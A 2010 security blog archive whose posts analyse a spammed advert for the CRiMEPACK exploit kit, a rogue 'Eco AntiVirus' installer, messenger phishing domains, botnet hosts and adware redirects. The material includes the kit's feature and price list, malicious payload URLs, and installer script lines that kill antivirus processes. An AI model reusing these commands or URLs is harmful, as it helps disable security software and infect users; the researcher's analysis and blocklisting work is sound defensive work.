Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 28 February 2010

Crimepack for sale: I wanna be a storm trooper! ....

... but I'll settle for having a laugh at a spam that's just came in. Laughing you ask? Well yes - for starters there's no plain text content, no subject and no HTML content.

It would seem these silly spammers have decided it best to include the content in the actual headers (likely a bug in their auto-mailer);

Return-Path: root@server.bestindiansexvideos.com
Delivered-To: r00t-y0u_org@it-mate.co.uk
X-FDA: 63288034572.03
X-Panda: scanned!
X-Filterd-Recvd-Size: 3729
Received: from server.bestindiansexvideos.com (unknown [205.234.223.183])
by imf25.hostedemail.com (Postfix) with ESMTP
for ; Sun, 28 Feb 2010 18:44:45 +0000 (UTC)
Received: from root by server.bestindiansexvideos.com with local (Exim 4.69)
(envelope-from )
id 1Nlo89-00035f-E4
for r00t-y0u_org@it-mate.co.uk; Sun, 28 Feb 2010 13:44:41 -0500
To: r00t-y0u_org@it-mate.co.uk
From :CRIMEPACK
Subject: CRiMEPACK EXPLOIT SYSTEM

We are here to introduce to the newest exploit system on the market and a whole new concept for the people:

"highest rates for the lowest price"

We do not focus on having a fancy ajax layout and shitty rates combined with outrageous prices like other packs, we focus on the outcome.

All exploits used are modded to perfection to get the highest rates out of it possible.
And instead of throwing together as many exploits as possible (like other packs out there)
We decided to handpick a few with higher effectiveness

That Includes:

Globals

+ Flash10
+ Adobe Acrobat Reader (<= 9.2)
+ JRE (Many vulnerable)
+ AGGRESSIVE MODE**
Internet Explorer

+ MDAC
+ DSHOW
+ MS09-002

** This is a feature that can be turned on/off from the settings panel
It's a Java applet that will popup asking the user to run the applet, If he approves, exe will load.

Exploit rates on test run (26/2/2010)

Internet Explorer 6 & 7 - 39%
Firefox - 14%
Opera - 6%
Overall Rate: 30%

Rate Countries:

US: 14%
UK: 7%
IN: 38%
DE: 16%
TR: 22%
IT: 18%
AU: 11%

Note that these stats are taken from the test run
The results may increase or decrease depending on quality of traffic

------------------------------------------------------------------------------------------

Features:

1. Undetected from AV Scanners (Javascript & PDF/JAR/JPG files)
2. Random PDF Obfuscation (Not using static pdf file like other packs)
3. Blacklist checker & AutoChecker
4. Prevent Wepawet, Jsunpack and other javascript unpackers to decode your page

Will autocheck (can be turned off) your domain for blacklist & malware lists, and will notify you if found, Checks the following:

+ Norton SafeWeb
+ My WebOfTrust
+ Malc0de
+ Google Safe Browsing
+ Malwaredomainlist
+ Mcafee SiteAdvisor
+ hpHosts
+ Malwareurl



------------------------------------------------------------------------------------------

Current version 2.2.1 prices:

$400 - 1 License

1 License includes:

+ Domain locked one domain (subdomains unlimited)

+ 2 new domain builds if blacklisted

+ Support

+ Minor updates for free

+ Discount on new releases


Extras:

1. Domain re-build for other domain (50$)

*** NOTE: YOU ARE NOT ALLOWED TO RESELL/SHARE, IF WE CATCH YOU DOING THIS YOUR LICENSE WILL BE REVOKED ***

2. AV-Cleaning ($80 first time, $50 after)

If you are interested in promoting/reselling, you will get a good offer

------------------------------------------------------------------------------------------

Contacts:

MSN: crimepack@googlemail.com
ICQ: 631592697

WE ACCEPT PAYMENTS THROUGH WEBMONEY AND LIBERTYRESERVE
Message-Id:
Date: Sun, 28 Feb 2010 13:44:41 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.bestindiansexvideos.com
X-AntiAbuse: Original Domain - it-mate.co.uk
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - server.bestindiansexvideos.com


As you'll notice from the headers, the e-mail originated from 205.234.223.183 (205.234.128.0/17 - AS23352 SERVERCENTRAL Server Central Network), which is home to;

bestindiansexvideos.com
buycheapmobilecontractphones.com
cheapholidaysflightshotels.co.uk
chinanewsx.com
clothesshop4u.co.uk
contractphoneslive.com
freepornza.com
gmobilephones.co.uk
holika.com
mobilephonedealshub.com
taxizza.com
uknewsx.com
watchindiansexvideos.com
wearelondoners.co.uk


Best I can tell, every single one looks like someones poor attempt at SEO.



But wait, there's also an advert there for eco-antivirus-2010.com. Wonder what happens if I click that "advert"? Well, the URLs we're taken through are;

http://www.holika.com/c/adclick.php?ad=YWR2ZXJ0aXNlcl9pZD0xMDM2JmNhbXBhaWduX2lkPTQyJnB1Ymxpc2hlcl9pZD0xMDAyJmNsaWNrX2NwYz0wLjEwJnJhbms9MSZ6b25lPTEmdXNlcl9pcD04Mi4zOS4xMjMuNTYmb2Zmc2V0PTIyJmNsaWNrX2lkPTY0OGFhZDBjZjQ3MjM5OWFkYTdhODJjMjk2MzI1ODcxJmtleXdvcmQ9Jm1hdGNoZWRfa2V5d29yZD0mYWRfY291bnQ9MyZwYWdlX3JlZmVycmVkPWh0dHAlM0ElMkYlMkZ3d3cud2F0Y2hpbmRpYW5zZXh2aWRlb3MuY29tJTJGJnVybD1odHRwJTNBJTJGJTJGcHJvcHJhdG9yMTQuaW5mbyUyRjA4N3dMeVF6TDFFekwlM0QlM0QmZGF0ZXN0YW1wPTIwMTAtMDItMjggMTQ6MDI6MzkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZjeHVfaWQ9OTM3NTkmY3h1a19pZD0w;eaddeca30bdba43e2ee3c8b04bcc8a3e
http://www.holika.com/c/adclick.php?ad=YWR2ZXJ0aXNlcl9pZD0xMDM2JmNhbXBhaWduX2lkPTQyJnB1Ymxpc2hlcl9pZD0xMDAyJmNsaWNrX2NwYz0wLjEwJnJhbms9MSZ6b25lPTEmdXNlcl9pcD04Mi4zOS4xMjMuNTYmb2Zmc2V0PTIyJmNsaWNrX2lkPTY0OGFhZDBjZjQ3MjM5OWFkYTdhODJjMjk2MzI1ODcxJmtleXdvcmQ9Jm1hdGNoZWRfa2V5d29yZD0mYWRfY291bnQ9MyZwYWdlX3JlZmVycmVkPWh0dHAlM0ElMkYlMkZ3d3cud2F0Y2hpbmRpYW5zZXh2aWRlb3MuY29tJTJGJnVybD1odHRwJTNBJTJGJTJGcHJvcHJhdG9yMTQuaW5mbyUyRjA4N3dMeVF6TDFFekwlM0QlM0QmZGF0ZXN0YW1wPTIwMTAtMDItMjggMTQ6MDI6MzkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZjeHVfaWQ9OTM3NTkmY3h1a19pZD0w%3Beaddeca30bdba43e2ee3c8b04bcc8a3e&c_result=e4cd7e371cdf54da833ec0ec3cc0521c
http://proprator14.info/087wLyQzL1EzL==
http://scnadator14.info/25/27-087wLyQzL1EzL==


With the payload (Eco_Install.exe, MD5: 3de085a41b50d0c038aa29a5e9888bf2) coming from;

http://prodloader14.info/P42099415AC42B8101BA62/inrtall.aexe?counter=1
http://prodloader14.info/P42099415AC42B8101BA62/inrtall.aexe?counter=2


This malicious goodness is hosted surprise surprise, by AS32613
IWEB-AS iWeb Technologies Inc. http://www.iweb.com/ (174.142.0.0/16), on 174.142.96.0/24. You'll no doubt recognize some of the other domains listed.

VirusTotal shows 26 vendors detecting this particular variant;

http://www.virustotal.com/analisis/10ab76e229200dd6ce179d9533b07d92be7bd02189e826d57d31315c1321be31-1267388160

The file is packed with 7zip, and unpacking it shows several dll files, one batch file (DD.bat), and of course, the nsis.nsi file.

Eco_Install.exe/
Eco_Install.exe/[NSIS].nsi
Eco_Install.exe/$COMMONSTARTMENU
Eco_Install.exe/$COMMONSTARTMENU/Programs
Eco_Install.exe/$COMMONSTARTMENU/Programs/ Eco AntiVirus
Eco_Install.exe/$EXEDIR
Eco_Install.exe/$EXEDIR/DD.bat
Eco_Install.exe/$EXEDIR/$PLUGINSDIR
Eco_Install.exe/$EXEDIR/$PLUGINSDIR/nsExec.dll
Eco_Install.exe/$EXEDIR/$PLUGINSDIR/NSISdl.dll
Eco_Install.exe/$PLUGINSDIR
Eco_Install.exe/$PLUGINSDIR/someth.dll
Eco_Install.exe/$PLUGINSDIR/UAC.dll


Looking at the NSIS file showed some rather interesting strings, such as;

StrCpy $1 "t414q"
StrCpy $[36] "v.net"
StrCpy $[35] "http://ahah3h884.eco-a"
StrCpy $[34] "http://ahah3h884.eco-a"


If we load ahah3h884.eco-av.net (also hosted at 174.142.96.2), we're automagically 302'd to macacafe.com (69.64.155.126, AS21740 DemandMedia AS DemandMedia);

HTTP/1.0 302 Found
Expires: 0
Pragma: public
Cache-Control: must-revalidate, post-check=0, pre-check=0
X-Powered-By: PHP/5.2.6-1+lenny3
Location: http://macacafe.com
Content-type: text/html
Content-Length: 0
Connection: keep-alive
Date: Sun, 28 Feb 2010 20:20:55 GMT
Server: lighttpd/1.4.23


Rather surprising given this domain isn't live - it's parked (though given this behaviour is seen when loading several other mysterious sub-domains associated with Eco AntiVirus/Green AntiVirus, it wouldn't surprise me if this was deliberate).

Looking further down the NSIS file, we also see it attempts to kill the task of varying security programs, including NOD32, Windows Defender and McAfee;

IfFileExists $SHELL[17]\Windows Defender\*.* 0 392
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im MSASCui.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\McAfee\*.* 0 398
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im mcregist.exe /im wmiprvse.exe /im mcsysmon.exe /im Mcshield.exe /im McNASvc.exe /im MpfSrv.exe /im McSACore.exe /im mcagent.exe /im msksrver.exe /im MpfSrv.exe /im mcmscsvc.exe /im McProxy.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\Eset\*.* 0 404
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im nod32krn.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\Windows Defender\*.* 0 411
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im MSASCui.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
Rename $SHELL[17]\Windows Defender\*.* $SHELL[17]\dm\*.* 0


I'm planning on running the installer later (assuming it'll run on my 2000 test machine (64MB Ram, so probably not)), as there's also references to additional files being downloaded, but due to the NSIS file containing a ton of "Invalid" lines, I'm suspecting either the installer I've got is corrupted, or I've missed a string somewhere (Anubis reports the same thing, as does CWSandbox, but the report shows the URL's returning a 404). I'll report back on that once I'm done.

Malwarebytes AntiMalware users will be pleased to know this is already detected as Rogue.EcoAntiVirus.

Full Circle Magazine: Issue 34

In the magazine:

- Command and Conquer.
- How-To : Program in Python – Part 8, Digitally Retouching a Photo in GIMP, and The Perfect Server – Part 4.
- My Story – a Linux User, and Powerpets.
- Review – Acer UL30-A laptop.
- MOTU Interview – Roderick Greening.
- Top 5 – Reference Tools.
- Ubuntu Women, Ubuntu Games, My Opinion, and all the usual goodness!

Read more
http://fullcirclemagazine.org/2010/02/27/issue-34-is-on-the-horizon/

Get it while it's hot!
http://fullcirclemagazine.org/issue-34/

Issues 0 - Current
http://fullcirclemagazine.org/downloads/

Forums:
http://ubuntuforums.org/forumdisplay.php?f=270

Wiki:
http://wiki.ubuntu.com/UbuntuMagazine

Friday, 26 February 2010

Sun Network: MSN/AIM/Gtalk/Yahoo phishing - again

It would seem, dear readers, that the folks at Sun Network have decided booting our friendly phishers, isn't a good idea after all, as they're now back yet again, spamming via MSN and whatnot, with links that lead to phishing scams such as the one in the screenshot to the left, that steal your MSN, Yahoo, AIM and GTalk credentials.

Once stolen, you're then once again, redirected to ishowclips.com. Sites I've currently identified are;

cant-stop-laughin-hehe.com
com.crazily-laughed-on-u.com
crazily-laughed-on-u.com
forbidden-pics-of-you.com
omg-funny-i-gotcha.com
our-truth-is-here-hehe.com
smiles-on-your-faces.com
super-liars-are-crazy.com
www.cant-stop-laughin-hehe.com
www.crazily-laughed-on-u.com
www.forbidden-pics-of-you.com
www.omg-funny-i-gotcha.com
www.our-truth-is-here-hehe.com
www.smiles-on-your-faces.com
www.super-liars-are-crazy.com
www.your-damn-secrets-revealed.com
your-damn-secrets-revealed.com


The above are presently at 121.54.171.30 and 121.54.171.44, but the entire /24 has seen it's share of phishing and malware, and on that, I'd suggest blackholing them, seems they aren't going to learn.

Thursday, 25 February 2010

Alert: tracox.pwnz.org, r30686.ovh.net

I was notified earlier about tracox.pwnz.org, which has been reported as a botnet C&C for the Spybot.AVEO infection (Trend Micro has it pegged as WORM_IRCBOT.ABJ). After reading up on this, I'd strongly urge everyone blackhole it asap.

Trend Micro's writeup also has reference to it's contacting r30686.ovh.net (yep, OVH again) which resides at 87.98.173.190, so I'd suggest blackholing that one too. This IP houses;

irc.camelug.it
poker-974.com
r30686.ovh.net
tracox.pwnz.org


Not only does this worm steal gaming related details from the infection computer, it also monitors for specific sites such as banks, PayPal, RapidShare etc, and attempts to spread across network shares.

You can read the full details on this one at;

http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=WORM_IRCBOT.ABJ
http://en.securitylab.ru/viruses/391068.php

Finland's CERT also has a writeup (translated) referencing the OVH IP as being part of the "Chuck Norris" infection;

http://www.cert.fi/tietoturvanyt/2010/02/ttn201002231554.html

Incidentally, if anyone has a sample of this, please drop me an e-mail.

Wednesday, 24 February 2010

Micro Chip Computers: A lesson in losing customers

I had an interesting conversation this morning with one of my local PC stores. First a back story ....

Around Feb 4th, I bought a second hand hard drive for one of the servers (as it was only £20 (160GB HDD) I thought what the heck). I didn't get round to checking it until last week, and surprisingly, upon my booting the drive, I noticed the previous customers Windows installation was still present - but it then got a whole lot worse - the customers personal files, inclusive not only of 60GB of music, but his CV, financial data (as far as I could tell), and a whole host of other identity theft friendly stuffage, was still on the drive.

Needless to say, my first thought was to contact the customer to inform them of my finding. The customer was obviously quite shocked, and very annoyed at the shop. I advised him I'd get an image of the drive and pop it over to him.

Sadly, when I went to get the image the next day, the drive refused to power up - it was dead - completely. I returned it to the shop, and advised them not only of the drives being dead, but their customers data still being on the drive. The bloke in the shop advised me it wasn't his customers drive (it was, and his customer confirmed it was), but was a "test drive", and it wasn't his customers Windows installation/personal files, but merely a backup of such (errr nope, it wasn't). Asking for my money back, I was told he'd have to send it away as it was a NEW DRIVE (it wasn't), and worked when he'd sold me it (at least he was partially right).

Calling back this morning, I was told in no uncertain terms;

"You can have your money back or you can have another drive, but we never want you in our shop again as it was a very sly thing you pulled"

Asking what he meant by "very sly thing", I was told he was referring to my contacting his customer. So hang on, the shop breaches the data protection act (at the very least), and I'm the one in the wrong??? I think not. As far as I'm concerned, it wasn't sly at all. The customers data was still on the drive and they had a right to know (I'm familiar with the shop and am in no doubt if I'd not called the customer myself, they'd have brushed it under the carpet).

Alas, whilst I've now got my money back, I'm now barred from Micro Chip Computers in Whitley Bay - for doing the right thing .... (had I been someone with malicious intent, the shops customer could've been in for a whole heap of issues, whilst I didn't expect a thank you from the shop, being barred is the last thing I expected - no loss though, I usually use my friends company for all of my hardware needs).

Wednesday, 17 February 2010

IAC/MindSpark: Scamming with a twist

It would seem folks, IAC/MindSpark aren't happy with their current methods of attracting new victims, err, users. Now they've decided to go with a scamming approach.

What does this entail you ask? Well, look at the screenshot to your left - there's two adverts there. One asks which is a better presenter, offers a "free" (sic) $500 Visa gift card, and claims to be leading you to myrewardsvault.com (FYI, myrewardsvault.com is also a phishing scam, though seperate to his particular case) - in actuality however, the path (note, other sites are loaded via webfetti.com itself) you're taken through is;

gnspf.com/click/?s=12064&c=209703
fbgdc.com/click/?s=12064&c=209703&internal=P_i6q4m_1
webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0

Headers:

GET /click/?s=12064&c=209703 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: gnspf.com
Cookie: BIGipServertracking-pool=16912556.20480.0000

HTTP/1.1 302 Found
Date: Thu, 18 Feb 2010 06:23:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 18 Feb 2010 06:24:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DEVa TAIa OUR BUS"
Location: http://fbgdc.com/click/?s=12064&c=209703&internal=P_i6q4m_1
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

------------------------------------------------------------------
GET /click/?s=12064&c=209703&internal=P_i6q4m_1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: 1444=KpIYL2uZmgg4yIJzEYBGyQ%3D%3D%7CqjyUwp8DXB9V1V5TMGJkPSlTNVlAjeL74g6%2BPMEneNa4Z6RpC7zW9QFEWUcve0Yl%2B8oqlmF7zn90JSJZeTfITzv7oMCc0nToxsi1O19dKCB9lyanI4LgY73jrpHvpQ0kQqDBK8kdQVOy5%2FD1Aa%2B4X77aKrtx%2BEsk%2FzjS9rGchGL2u5drA7pq17NXA6MD2vrUlUCnEkGTUu2kWVNhvIATkCfIcHnPhfZGNLvmuKC5YRHqtTytab3RN9175GmloAb8AFIUKNIRfly%2FAbFbgowvkqvrAb3fTnaIfR3xIjng4JNs%2BVcyNo8r1fRoueThopUnE9tptsH80njl2oVhkHEEVdq%2FiY92tU4JVdxBe19osUel%2BbMWt9zUfrjnqmESICOaTT8S2liDyEL9SgAH8gqFgptKLC9ALKdHG%2F773bXPz3SvNFWrTDa9oerKJUy97AS4JBoBUsOU4%2FBsBm2pCQFV4ofrFt1lRukrYIRjuRLvgR%2B9oR04tutzZPEnbXOyM%2BVPv%2BEXbB8Vz7GJO2dnBBmas%2FtAdgDeog3lsf8qpHeUcMIldPB2Sc%2BZl%2FNRReOYYmfgvrCEoxUgOiiWXH3aQDfexZk%2BQMoI%2F940Fv8a968F7h8RD%2FIYHNAx3yQo7DR%2BnOFmEhHNdM6Dgq5mt6RbXR7G2F1xTnhcVu77FHRyzVWn%2Fx77bI7QGb0UtEJuWrLavrkMo5ONcGvMFFpZSdrStN1fCDy5GwnddxVd3l9qm2GlOpqoOGp6yWrqS%2Fad9VLSz3YML1%2BSadvEtjwilzHnhXzWQ6H31ThqsAgaRa1diaQtRAhhWRnxBGd222pTYZUYE2I4Q7sbrY5sTWz7ucyxh3LFsn64R%2FfZYI8H4f%2BsRjyiJbGUoUay6fdFJ4OFLP%2BB2b20jkGrNXfylMsUlp1LNS%2FCkLPQNwlv8BRvC8r%2F2Xh6QfPDmDVx%2FUFjCRHd6o0fdtXk%2FyVxoloxn8HZseQR%2BxW6HTCLjb%2FKBv19l5PVzzHirZs%3D; 1444-encoded_click=HDYls521-; 1444-affiliate_id=31826; 1444-site_id=12064; 1444-subid=redirect_from_6471_to_1444; 1444-2378=Z2z2asUNHzcxmaw0ynMegA%3D%3D%7CtshesoOPB3UHr%2BS5ChA2621ZRA%2BEw7AjRSgorteE%2FNK74nW4d5q2AM3SvYf3LMXaR1tcZOCMrxz75lPhulFluQ%3D%3D; 1444-2378-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5449=adY0WdbTzSZpTEq2L14taA%3D%3D%7C1FD22QIwSrWIFxhAWIEAYJch1LzDpGS%2FN56KiBBRgVX5PDckVK%2BHhiJQ8W9RB%2F5VkVv8a9P%2BiLKZJ00YJnsSjg%3D%3D; 1444-5449-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5450=jby15tERjZmHHorIXxobBg%3D%3D%7C3v9J3o%2BGdmKze3u3l9LRIh2ZMesmz4gyr5awW8S4PgR2cjMER8wIdTUARlQx9y66s2SwZEdkVnxnd1gknvXExQ%3D%3D; 1444-5450-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5451=SpssNVCIGQvBeLWjaSD1LQ%3D%3D%7Cd77q%2BNbs2SBTucOnkYKGxQmrHK2HdA7KOSPm3trhLmiBdzDXu6kD7s2UGdThXHDgh2CWDak1jK7YDo%2FYwaSVQA%3D%3D; 1444-5451-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5481=yCI7pWNRV5Yt1Fg2omnf8A%3D%3D%7Ct0AwAP%2BrcZaIyyfYz3rY%2Fd0H5mkrfJAjuO2%2B14J8pAIqJUDIpCT302wCUwDjZzOh9QxHfdbC9ZWsk6LfBs6nMw%3D%3D; 1444-5481-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5482=ojzalu2fMmT3w43Ko7sLbg%3D%3D%7COXlb8JTzkyeFA6HXqkSmI73OLuahw6i4pOUut1wALR7cdRNDxN4tnYjzT47VQkjoBEmi5yLb7y5S%2Bh%2FPFUoYeg%3D%3D; 1444-5482-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5483=zpADcNHI2qtsUc2Wt%2Bk%2Fyg%3D%3D%7C%2BoxJht7mTbd9SBe3nR2HgwoPjEmcrCuk71vxiD29hEk181JnpnE4L5HE0U%2BfZddYK0veY8OGAvOxtPF3Q9hb1A%3D%3D; 1444-5483-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-6255=29juYjYW1tYJ5pQsG%2BtgXw%3D%3D%7CF9l1X2oEiBLrsUL14jAMzwuLXeRgfNrxsQDtQHShQbdvYeV2nskixZJKrsQdYuXfFn3xz0OMWbPA4OPbXgOeYQ%3D%3D; 1444-6255-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-7742=KQEq%2BhO02iXamXej3Pd6XA%3D%3D%7C0t9QWq%2B0JFJ0VV3ZKYtZ64b%2F%2BUPBugH0gKSw%2BgglT%2BeSx26WuP2zrYkokX4QkLC3x%2Bj5%2BkspwJQB5eM2caqKjw%3D%3D; 1444-7742-converting=317a05143c8f1656b95559c0f339974892f4cd69; BIGipServertracking-pool=16978092.20480.0000
Host: fbgdc.com

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:24:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 18 Feb 2010 06:24:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DEVa TAIa OUR BUS"
Set-Cookie: 1444-2378=YdptRXGxNQG5IohFGonDgQ%3D%3D%7CJE3gg24QTSzyuX22CcyLBjJTH%2FFW4bJS4swvdXvptwYz4QRk1mrQNIXg1F6oI1t8xItVV%2FsQjq2XbSMPTLXpKw%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-2378-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5449=1WhgdNsqXda7JGenynONkw%3D%3D%7CJ2404Gcek%2FzCxIBKZigM%2FhVCDd48NmFnyou4WBHLWtfcw2Jecf%2BxNYuTyYiCedUWuQWPqxUUi9feh17CTEiiTw%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5449-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5450=7LomrXgULt929GiWG5jf0g%3D%3D%7C9wakmhYex26XFYQrpQqMS%2FlHwikSnu0mht%2BPYLGXZb%2BObCo5DIFrk%2Fi4ExiY%2BLdijTCEfaQMlnoVPUDca40jpw%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5450-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5451=JwMW1js74qIieapB3WpJNw%3D%3D%7CRpJR7wMx93ueVmp10Zvw9tMV2m4%2BPv2yxblJlaLntrfO8GWGPGh7FuOX5j88evS5WhA4eY4o5Znv4h6zIMo5SQ%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5451-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5481=FqOS6ISyP8CfRFkVzZnyDA%3D%3D%7Cux%2FQ6C0Utm%2BYeSEQKK5xddyMRtwQ319FUKstK%2FX49vuTBGVzixsVTkLhrZbkgPyAqio70d7e4fwMcDRaCBWBfQ%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5481-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5482=TqQNc1PGPN%2FrkYY28xiX7w%3D%3D%7CE%2BhXF4RkXJo1ZoXFBjedvbaQj8TCR4yLh%2BAISaaGZ2VMhRuslDjTyc4mYlSdl9jZaPc%2Fmop8R501XTsQKEkMBA%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5482-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5483=hUmKRrUyDCTJHcIGj7c2HQ%3D%3D%7CQL5dFiB%2FfVOvqjlUmApbSxYRhEog6XDlXxvOpfNqAN0vTi5JDmp67rAENuiMR61%2BwEc%2BRF6LI1eG0S8Gs%2FmT8w%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5483-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-6255=vZojfgVC9BlD3drz0wSKdw%3D%3D%7C3X9OxHiFeuoS0EJ2JOy%2FujFlC3s4XjfG8Rp3SRtPZMxzr5lXIticrs4Sl9KQuBU%2B%2Fza3zcdMlnbTcmg8H3jmwQ%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-6255-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-7742=C%2BFz0sqBLuTkryT1Tg8dzw%3D%3D%7C%2B8iXNv2Q7p%2FFPIh5xobW8WRLvg%2FKk%2BNkuG0EvzY7oyIQVbUJqv2f%2F4vhUjzehbNSXm9cFrK%2FvRapzjF3v%2F0jug%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-7742-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Content-Length: 802
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

------------------------------------------------------------------
GET /dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: www.webfetti.com
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:24:07 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Language: en-GB
Content-Length: 5445
Connection: close
Content-Type: text/html;charset=UTF-8

------------------------------------------------------------------
GET /dl/toolbarDetect/toolbar.js HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
